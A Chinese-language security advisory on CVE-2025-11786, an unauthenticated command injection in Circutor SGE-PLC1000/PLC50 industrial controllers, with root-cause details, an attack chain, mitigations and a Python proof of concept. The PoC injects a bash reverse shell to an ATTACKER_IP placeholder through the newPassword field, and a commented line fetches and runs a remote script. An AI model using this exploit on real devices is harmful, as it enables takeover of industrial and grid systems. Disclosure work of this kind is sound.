CVE-2025-11786 Circutor SGE-PLC1000/SGE-PLC50 SetUserPassword() 远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2025-11786

漏洞类型

缓冲区溢出 / 远程代码执行 / 命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Circutor SGE-PLC1000, Circutor SGE-PLC50

漏洞概述

CVE-2025-11786是Circutor SGE-PLC1000和SGE-PLC50设备中发现的一个严重安全漏洞，CVSS评分高达9.8分（满分10分）。该漏洞存在于设备的SetUserPassword()函数中，是一个基于栈的缓冲区溢出漏洞。攻击者可以通过构造特定的newPassword参数值，绕过安全验证，直接将恶意Shell命令注入到系统调用中并执行。由于该漏洞无需认证即可利用，且攻击复杂度低，攻击者可以在不需要任何用户交互的情况下远程执行任意代码。SGE-PLC系列设备是广泛应用于工业控制系统和智能电网管理的重要设备，此漏洞的存在可能导致整个工业网络被攻击者完全控制，造成严重的生产安全风险和数据泄露风险。INCIBE-CERT协调披露了此漏洞，建议受影响用户立即采取防护措施。

技术细节

该漏洞的根本原因在于SetUserPassword()函数对用户输入的newPassword参数缺乏安全处理。函数使用sprintf()函数将newPassword参数直接拼接到Shell命令字符串中，而没有对输入进行任何长度检查、特殊字符转义或输入验证。随后，该命令字符串被直接传递给system()函数执行。由于sprintf()函数不进行边界检查，当newPassword参数长度超过目标缓冲区大小时，就会发生栈缓冲区溢出，覆盖相邻的栈内存区域。攻击者可以利用这一特性，通过在newPassword中嵌入Shell元字符和命令（如分号、管道符、反引号等），构造恶意的命令序列。当system()执行该命令时，注入的命令将以与应用程序相同的权限运行，通常是root权限。这使得攻击者能够完全控制设备，执行任意操作，包括读取敏感配置、修改系统参数、安装后门或进行横向移动攻击整个工业网络。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标Circutor SGE-PLC设备，通过端口扫描或 Shodan/Censys 等搜索引擎发现暴露在网络中的设备，并确认其版本信息

STEP 2

Vulnerability Analysis

攻击者分析 SetUserPassword() API 端点，确认 newPassword 参数直接用于 sprintf() 命令拼接，没有输入验证或长度检查

STEP 3

Payload Crafting

攻击者构造恶意 newPassword 值，注入 Shell 命令（如反弹 shell、下载恶意脚本或直接执行命令），使用分号、管道符或反引号等元字符绕过原命令

STEP 4

Exploitation

通过 HTTP POST 请求向 /api/user/password 端点发送恶意 payload，sprintf() 将其拼接到命令字符串中，system() 执行时注入的命令以 root 权限运行

STEP 5

Post-Exploitation

攻击者获得设备完全控制权后，可安装后门、窃取敏感数据、修改 PLC 配置、横向移动攻击其他工业系统，或将设备纳入僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3 # CVE-2025-11786 PoC - Circutor SGE-PLC1000/SGE-PLC50 Remote Code Execution # Discovery: [email protected] import requests import argparse import sys def exploit(target_ip, target_port=80, attacker_ip="ATTACKER_IP", attacker_port=4444): """ Exploit the SetUserPassword() buffer overflow to achieve RCE This PoC demonstrates command injection via newPassword parameter """ target_url = f"http://{target_ip}:{target_port}/api/user/password" # Construct malicious password with reverse shell payload # The payload uses command substitution to execute reverse shell payload = f";bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1 #" # Alternative payload using base64 encoded command # cmd="wget http://{attacker_ip}/shell.sh -O /tmp/sh && bash /tmp/sh" # payload = f";echo {base64_cmd} | base64 -d | bash #" data = { "newPassword": payload, "username": "admin" } try: print(f"[*] Sending exploit payload to {target_url}") print(f"[*] Payload: {payload}") response = requests.post(target_url, json=data, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response: {response.text}") return True except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-11786 PoC") parser.add_argument("target", help="Target IP address") parser.add_argument("-p", "--port", type=int, default=80, help="Target port") parser.add_argument("-l", "--lhost", required=True, help="Attacker IP for reverse shell") parser.add_argument("-P", "--lport", type=int, default=4444, help="Attacker port") args = parser.parse_args() print("=" * 60) print("CVE-2025-11786 - Circutor SGE-PLC RCE Exploit") print("=" * 60) exploit(args.target, args.port, args.lhost, args.lport)

影响范围

Circutor SGE-PLC1000 v9.0.2

Circutor SGE-PLC50 v9.0.2

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，将受影响设备部署在独立的 VLAN 或网络分段中，与企业网络和互联网隔离；其次，通过防火墙或 ACL 严格限制对 PLC 管理端口的访问，仅允许经过授权的管理 IP 地址访问；同时，关闭设备的远程管理功能或使用 VPN 隧道访问；此外，监控设备日志和网络流量，及时发现异常行为；最后，考虑部署 Web 应用防火墙（WAF）过滤恶意请求参数，防止命令注入攻击。